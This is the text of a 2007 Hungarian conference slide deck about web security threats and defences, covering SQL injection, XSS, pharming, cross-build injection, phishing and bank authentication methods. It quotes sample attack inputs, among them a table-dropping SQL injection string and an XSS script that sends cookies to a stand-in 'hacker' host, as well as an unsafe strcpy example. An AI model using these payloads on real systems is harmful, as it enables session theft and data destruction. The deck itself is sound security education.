Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft. www.cardinal.hu Cardinal Kft., Gyimesi István 2007. 1
Hova fejlődött az Internet az elmúlt 10 évben? Kommunkációs protokollok A web nyelve Biztonsági kockázatok Leggyakoribb támadási módok Védekezési lehetőségek Felvilágosítás fontossága Cardinal Kft., Gyimesi István 2007. 2
Egy kis Internet történelem - kommunikáció 1974 1981 1996 1999 2008 TCP IPv4 IPv6 HTTP1.1? HTTP1.0 Cardinal Kft., Gyimesi István 2007. 3
Egy kis Internet történelem a web nyelve 1996 1998 ~1960 1991 1995 1997 2001 2008 SGML HTML JavaScript HTML4 XHTML? DOM CSS XML Cardinal Kft., Gyimesi István 2007. 4
Egy kis Internet történelem a web nyelve 2003 körül: DHTML (Dynamic HTML) XHTML oldalak DOM alapú manipulálása Használt szabványok: HTML CSS JavaScript DOM Cardinal Kft., Gyimesi István 2007. 5
Egy kis Internet történelem a web nyelve 2003 körül: DHTML (Dynamic HTML) XHTML oldalak DOM alapú manipulálása Használt szabványok: HTML 1991 CSS 1996 JavaScript 1995 DOM 1998 Cardinal Kft., Gyimesi István 2007. 6
Egy kis Internet történelem a web nyelve 2005: AJAX (Asyncronous JavaScript And XML) Desktop alkalmazás-szerűbb web alkalmazások Használt szabványok: HTTP XML CSS JavaScript DOM Cardinal Kft., Gyimesi István 2007. 7
Egy kis Internet történelem a web nyelve 2005: AJAX (Asyncronous JavaScript And XML) Desktop alkalmazás-szerűbb web alkalmazások Használt szabványok: HTTP 1996 XML 1998 CSS 1996 JavaScript 1995 DOM 1998 Cardinal Kft., Gyimesi István 2007. 8
Lassan 2008-at írunk... Az Internet elavult, akadályozza a fejlődést. A böngészők még mindig különböző mértékben támogatják a szabványokat. e-megoldásokat erőszakolunk bele webservice e-government e-commerce e-business e-banking Cardinal Kft., Gyimesi István 2007. 9
Lassan 2008-at írunk... a HTTP csak kérés-válasz alapú kommunikációt biztosít nincs sessionmanagement (a cookie nem jó megoldás!) gyenge a user interface eltérően működő böngészők elégtelen biztonsági eszközök webservice Applet? A Microsoft ellehetetlenítette. Flash? A világ nem tekinti alkalmazásfejlesztő-eszköznek e-government e-commerce e-business e-banking Cardinal Kft., Gyimesi István 2007. 10
Nagyobb üzlet, mint a drogkereskedelem forrás: http://www.channelregister.co.uk/2005/11/29/cybercrime/ Ellopott adatok kereskedelme (bankszámla: $30-$400, hitelkártya adatok: $5, email-jelszavak $1- $300, email-címek: $2-$4/MByte) forrás: http://www.symantec.com/business/theme.jsp?themeid=threatreport Távirányított zombihálózatok kiépítése (szervezett támadások, harc a zombihálózatok között) Két kitalált internet banking oldal 8 hét alatt több, mint húszezer támadást kapott forrás: http://www.psineteurope.com/press/press_extended_view_eid_375_lid_18.html Cardinal Kft., Gyimesi István 2007. 11
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 12
Biztonsági rések kihasználása (exploit-ok) Már nem unatkozó egyetemisták írnak vírusokat! Elterjedtek a többrétegű támadások. A cél adatok (pl. email-címek) gyűjtése és botnet hálózatok kiépítése! A Storm féreg becslések szerint 2 milliós botnet hálózatot hozott létre. spam-ek küldése (összes levelezés 66%-a spam, és növekszik) DoS támadások szuperszámítógépeket meghaladó számítási kapacitás Cardinal Kft., Gyimesi István 2007. 13
És akkor a kínaiak... A céges helyett saját számítógépeik elé ülnek. Képzetlen felhasználók, nem foglalkoznak a biztonsággal. Rengeteg gép fertőződik meg egyszerre. (2007. október 1. és 6. között mintegy egymillió) Jelenleg a lakosság elenyésző hányada internetezik. (Vidéken pl. csak 5%) Félévente 15 millióval több internetező. (XI. ötéves terv: telefon mellé internet is jár) forrás: http://www.virushirado.hu/hirek_tart.php?id=1209 Cardinal Kft., Gyimesi István 2007. 14
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 15
A kliensoldali vizsgálat nem ér semmit! Cardinal Kft., Gyimesi István 2007. 16
A kliensoldali vizsgálat nem ér semmit! Cardinal Kft., Gyimesi István 2007. 17
A kliensoldali vizsgálat nem ér semmit! Nem szabad az input hosszában, tartalmában megbízni. A combo-ból is tetszőleges adat jöhet. A readonly mezők is változtathatók. <input name= username maxlength= 20... http://server/send.cgi?username=grrrrrrrrrrrrmrrrrrrrrrrrrrrrrrrrrrrrrrrrr int main(void) { char name[20]; } strcpy(name, getfield( username ); Cardinal Kft., Gyimesi István 2007. 18
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 19
Pharming DNS bejegyzéseket támad, az IP cím feloldás gyengeségét használja ki. Vírus segítségével az operációs rendszer hosts file-ját, Local Network Routerek DNS beállításait, WiFi routerek DNS beállításait írja át. Cardinal Kft., Gyimesi István 2007. 20
Pharming DNS bejegyzéseket támad, az IP cím feloldás gyengeségét használja ki. Vírus segítségével az operációs rendszer hosts file-ját, Local Network Routerek DNS beállításait, WiFi routerek DNS beállításait írja át. Cardinal Kft., Gyimesi István 2007. 21
Pharming A tanúsítványok érvényesek maradnak! Man-in-the-middle jellegű támadásokhoz vezet. Védekezés: vírusvédelem, tűzfalak routerek default jelszavainak módosítása WiFi hálózatok védelme Cardinal Kft., Gyimesi István 2007. 22
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 23
SQL injection Az SQL szöveges parancsformátum. Az alkalmazásoknak ilyen parancsokat kell összeállítani. Megfelelő inputtal támadni lehet az alkalmazást. statement := select * from users where name = ' + username + ' ; ha username értéke: a' or 't' = 't select * from users where name = 'a' or 't' = 't' de username lehet akár: a'; DROP TABLE users; -- select * from users where name = 'a'; DROP TABLE users; --'; Cardinal Kft., Gyimesi István 2007. 24
SQL injection where megváltoztatása más parancs beszúrása függvényhívás beszúrása adatbáziskezelő hibáinak kiaknázása http://www.securityfocus.com/bid/9587 Cardinal Kft., Gyimesi István 2007. 25
SQL injection Az oktatási anyagokban is fel kell hívni a figyelmet erre! Forrás: Programming ASP.NET (O'Reilly) Cardinal Kft., Gyimesi István 2007. 26
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 27
XSS: Cross-site scripting a támadó javascript kódot küld el bemenetként ez a kód lefut a böngészőben, amikor ez az input megjelenik a felhasználónál session azonosító ellopása input adatok elküldése egy másik szerverre <input type= text name= comment /> form input: <script>window.location='http://hacker/'+document.cookie</script> echo <P id= comment > echo $username echo </P> Cardinal Kft., Gyimesi István 2007. 28
XSS: Cross-site scripting a támadó javascript kódot küld el bemenetként ez a kód lefut a böngészőben, amikor ez az input megjelenik a felhasználónál session azonosító ellopása input adatok elküldése egy másik szerverre eredmény: <P id= comment > <script>window.location='http://hacker/'+document.cookie</script> </P> Cardinal Kft., Gyimesi István 2007. 29
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 30
XBI: Cross-build injection trójai kód elhelyezése nyílt forráskódú programokban fejlesztőeszközök on-line töltik le a szükséges komponenseket a trójai így számos szoftverben elterjed pharminggal is lehet kombinálni ftp.openbsd.org <dependency> <get src= ftp.openbsd.org/openssl.jar /> </dependency> Fejlesztőgép: dev@/source>build pharming Például: OpenSSL 3.4p1 trójai (2002., ftp.openssh.com feltörése, a támadó a kódban portot nyitott az internet felé) SendMail 8.12.6 trójai (2002., ftp.sendmail.org feltörése) Cardinal Kft., Gyimesi István 2007. 31
Védekezés webes alkalmazásokban Input ellenőrzése minden esetben. (hossz, tartalom, escape-elések) Ha kliensoldalon szűrök, nem szűrök semmit. SQL utasításokat ne sztringekből fűzzük össze. (használjunk paramétereket) Minimális jogosultsággal fusson a webes alkalmazás. Csak a legszükségesebb komponensek legyenek beépítve. Kimenő oldal vizsgálata, szűrése. Felhasználók többszintű autentikációja, hitelesítés, többszintű naplózás. Jelszavak kódolt tárolása, belső kommunkáció titkosítása. (A banki támadások 80%-a belüről jön!) Cardinal Kft., Gyimesi István 2007. 32
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 33
Phishing adathalász levelek 2006. december: BB, ERSTE, CIB, Raiffeisen, Szigetvári Tksz. cél: minél több mail megy ki, arányaiban annál több felhasználó esik áldozatul erre is jók a botnet hálózatok! vége: készpénz küldése küldföldre So long and thanks for all the phish! Cardinal Kft., Gyimesi István 2007. 34
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 35
Whaling nagy halakat keresnek meg vele cél: kevés, de jól célzott adatkérő levél elküldése Cardinal Kft., Gyimesi István 2007. 36
Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István 2007. 37
Social engineering nem feltétlenül az Interneten keresztül történik emberek hiszékenységének, segítőkészségének kihasználása pl.: nigériai levelek bizonyos szempontból a phishing és a whaling is ide tartozik Cardinal Kft., Gyimesi István 2007. 38
Hitelesítési módok A hitelesítéssel valószínűsítjuk (!), hogy a vonal túloldalán az adott személy van. Elterjedt hitelesítési módok: Aláírási jelszó TAN-kód Chipkártya Hitelesítő token SMS jelszó Cardinal Kft., Gyimesi István 2007. 39
TAN-kód egyszer használatos kódok jelszavas kiegészítő védelem kell hozzá már öt éve is elavultnak tűnt, de az ügyfelek még mindig használják TAN-kód tábla Felhasználó: Kiss János 992763826 887635527 772654183 278246283 892873427 236768276 980928748 908724878 762034678 987340598 924987264 028746892 032384756 028345023 732658287 527494376 663492578 923456789 934756543 824564732 924562776 245245678 234562347 234523458 234856788 234567823 243569762 976558767 768262548 276511971 134566791 823461658 265611651 147569156 785623456 245672364 349092345 987409284 932847098 293874592 948750928 298347509 074598279 194878726 874834783 992763826 887635527 772654183 278246283 892873427 236768277 980928748 908724878 762034678 987340598 924987264 028746892 992763826 887635527 772654183 278246283 892873427 236768277 980928748 908724878 762034678 987340598 924987264 028746892 992763826 887635527 772654183 278246283 892873427 236768277 980928748 908724878 762034678 Cardinal Kft., Gyimesi István 2007. 40
Token fizikailag független eszköz kódokat generálnak ha nincs PIN-kód, kiegészítő jelszavas védelem kell Cardinal Kft., Gyimesi István 2007. 41
Chipkártya legerősebb biztonság nem terjedt el eléggé olvasót, meghajtót telepíteni kell elveszik a mobilitás Cardinal Kft., Gyimesi István 2007. 42
SMS jelszó Magyarország vezető első: Konzumbank (2002.) egyszer használatos, időkorlátos kódok két független csatornát használ, ezeket egyszerre kell támadni Cardinal Kft., Gyimesi István 2007. 43
A tudás hatalom! Az emberek nincsenek tisztában az Internet lehetőségeivel, korlátaival, veszélyeivel. A biztonságos internetezésre is meg kell tanítani a felhasználókat. Céges környezetben kiemelten nagy érték az információ, és a biztonság-tudatosság. Otthoni WiFi kapcsolatok védelme. Bluetooth eszközök védelme. Etikus hacker tanfolyamok. És vigyázzunk az ünnepnapokon...! Cardinal Kft., Gyimesi István 2007. 44